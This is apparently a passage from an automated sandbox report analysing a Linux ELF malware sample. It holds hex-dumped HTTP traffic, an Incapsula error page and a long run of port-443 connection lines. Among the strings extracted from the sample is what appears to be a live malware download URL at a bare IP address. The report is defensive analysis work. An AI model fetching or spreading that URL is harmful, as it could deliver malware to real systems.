7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/htmlCache-Control: no-cache, no-storeConnection: closeContent-Length: 690X-Iinfo: 12-139671749-0 0NNN RT(1703174794820 0) q(0 -1 -1 -1) r(0 -1)Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 35 26 78 69 6e 66 6f 3d 31 32 2d 31 33 39 36 37 31 37 34 39 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 37 30 33 31 37 34 37 39 34 38 32 30 25 32 30 30 25 32 39 25 32 30 71 25 32 38 30 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 37 33 37 31 31 32 30 33 37 33 38 38 39 38 37 30 32 30 26 65 64 65 74 3d 32 32 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 50 4f 53 54 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 37 33 37 31 31 32 30 33 37 33 38 38 39 38 37 30 32 30 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=5&xinfo=12-139671749-0%200NNN%20RT%281703174794820%200%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29&incident_id=0-737112037388987020&edet=22&cinfo=ffffffff&rpinfo=0&mth=POST" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-737112037388987020</iframe></body></html>

Source: 86O41HaCl5.elf

String found in binary or memory: http://45.142.182.103/bin

Source: unknown	Network traffic detected: HTTP traffic on port 41734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 40408 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 48366 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50452 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49210 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38552 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37238 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 45088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60242 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37214 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37480 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 40662 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42602 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59494 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47282 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38564 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 32800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52416 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39502
Source: unknown	Network traffic detected: HTTP traffic on port 53934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 40674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51512 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41812
Source: unknown	Network traffic detected: HTTP traffic on port 49426 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 41938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41806
Source: unknown	Network traffic detected: HTTP traffic on port 37022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41802
Source: unknown	Network traffic detected: HTTP traffic on port 52898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 40866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 46148 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37492 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34394 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 40878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50644 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 41926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52514
Source: unknown	Network traffic detected: HTTP traffic on port 35478 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52518
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38210
Source: unknown	Network traffic detected: HTTP traffic on port 38744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52512
Source: unknown	Network traffic detected: HTTP traffic on port 50632 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39544
Source: unknown	Network traffic detected: HTTP traffic on port 39468 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38216
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38206
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40526
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40524
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41858
Source: unknown	Network traffic detected: HTTP traffic on port 57264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52526
Source: unknown	Network traffic detected: HTTP traffic on port 37058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39530
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39532
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40516
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39526
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40514
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40512
Source: unknown	Network traffic detected: HTTP traffic on port 52200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40510
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52538
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51208
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52536
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51206
Source: unknown	Network traffic detected: HTTP traffic on port 38360 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58348 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42410 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51200
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39520
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52534
Source: unknown	Network traffic detected: HTTP traffic on port 45268 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53866
Source: unknown	Network traffic detected: HTTP traffic on port 56192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 40204 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57252 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39516
Source: unknown	Network traffic detected: HTTP traffic on port 59228 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 48534 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40508
Source: unknown	Network traffic detected: HTTP traffic on port 38756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41830
Source: unknown	Network traffic detected: HTTP traffic on port 38768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50620 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51218
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51216
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51210
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52542
Source: unknown	Network traffic detected: HTTP traffic on port 44184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51214
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39512
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52546
Source: unknown	Network traffic detected: HTTP traffic on port 52212 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39504
Source: unknown	Network traffic detected: HTTP traffic on port 40698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41822
Source: unknown	Network traffic detected: HTTP traffic on port 35466 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39508
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41820
Source: unknown	Network traffic detected: HTTP traffic on port 48174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38250
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40570
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39582
Source: unknown	Network traffic detected: HTTP traffic on port 49618 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38258
Source: unknown	Network traffic detected: HTTP traffic on port 46582 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 48150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40568
Source: unknown	Network traffic detected: HTTP traffic on port 33716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40562
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40560
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40564
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53814
Source: unknown	Network traffic detected: HTTP traffic on port 48162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53816
Source: unknown	Network traffic detected: HTTP traffic on port 42434 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38246
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38248
Source: unknown	Network traffic detected: HTTP traffic on port 35082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40558
Source: unknown	Network traffic detected: HTTP traffic on port 39444 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40552
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40550
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38232
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38234
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39564
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38236
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38238
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39568
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40548
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38228
Source: unknown	Network traffic detected: HTTP traffic on port 40842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40540
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40544
Source: unknown	Network traffic detected: HTTP traffic on port 49606 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52506
Source: unknown	Network traffic detected: HTTP traffic on port 54430 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39550
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52508
Source: unknown	Network traffic detected: HTTP traffic on port 33704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38220
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39554
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38222
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39556
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38224
Source: unknown	Network traffic detected: HTTP traffic on port 47498 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50488 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38218
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40538
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40530
Source: unknown	Network traffic detected: HTTP traffic on port 36142 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41864
Source: unknown	Network traffic detected: HTTP traffic on port 52850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 46570 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 41108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40532
Source: unknown	Network traffic detected: HTTP traffic on port 51536 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43302 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 40036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40492
Source: unknown	Network traffic detected: HTTP traffic on port 39288 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40490
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38176
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38178
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51148
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52478
Source: unknown	Network traffic detected: HTTP traffic on port 47642 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52482
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51152
Source: unknown	Network traffic detected: HTTP traffic on port 36514 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52480
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51150
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40486
Source: unknown	Network traffic detected: HTTP traffic on port 33970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40484
Source: unknown	Network traffic detected: HTTP traffic on port 33500 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40488
Source: unknown	Network traffic detected: HTTP traffic on port 51164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34562 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38160
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39490
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40482
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39492
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39494
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51156
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52484
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51154
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51158
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52494
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51160
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47630 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39480
Source: unknown	Network traffic detected: HTTP traffic on port 33994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38154
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51164
Source: unknown	Network traffic detected: HTTP traffic on port 35934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60638 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52496
Source: unknown	Network traffic detected: HTTP traffic on port 36972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38158
Source: unknown	Network traffic detected: HTTP traffic on port 51152 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41798
Source: unknown	Network traffic detected: HTTP traffic on port 41386 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40468
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40466
Source: unknown	Network traffic detected: HTTP traffic on port 40494 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 45700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41790
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39470
Source: unknown	Network traffic detected: HTTP traffic on port 41086 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39474
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51178
Source: unknown	Network traffic detected: HTTP traffic on port 33982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39476
Source: unknown	Network traffic detected: HTTP traffic on port 43796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34574 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40458
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51184
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40452
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41788
Source: unknown	Network traffic detected: HTTP traffic on port 54454 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33524 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51108
Source: unknown	Network traffic detected: HTTP traffic on port 56576 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52438
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53768
Source: unknown	Network traffic detected: HTTP traffic on port 47678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51100
Source: unknown	Network traffic detected: HTTP traffic on port 60892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52432
Source: unknown	Network traffic detected: HTTP traffic on port 57420 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52430
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53766
Source: unknown	Network traffic detected: HTTP traffic on port 40482 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43326 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52448
Source: unknown	Network traffic detected: HTTP traffic on port 37876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51118
Source: unknown	Network traffic detected: HTTP traffic on port 40012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52442
Source: unknown	Network traffic detected: HTTP traffic on port 33536 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53772
Source: unknown	Network traffic detected: HTTP traffic on port 39264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47666 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52444
Source: unknown	Network traffic detected: HTTP traffic on port 53550 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51114
Source: unknown	Network traffic detected: HTTP traffic on port 56588 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56564 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53780
Source: unknown	Network traffic detected: HTTP traffic on port 54142 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60602 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38190
Source: unknown	Network traffic detected: HTTP traffic on port 41062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38192
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38194
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51122
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52454
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52452
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51126
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52458
Source: unknown	Network traffic detected: HTTP traffic on port 40024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33670 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53286 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47654 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38182
Source: unknown	Network traffic detected: HTTP traffic on port 54478 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38186
Source: unknown	Network traffic detected: HTTP traffic on port 33200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38188
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52464
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51134
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51138
Source: unknown	Network traffic detected: HTTP traffic on port 35910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 46808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60614 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43314 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52472
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52470
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40494
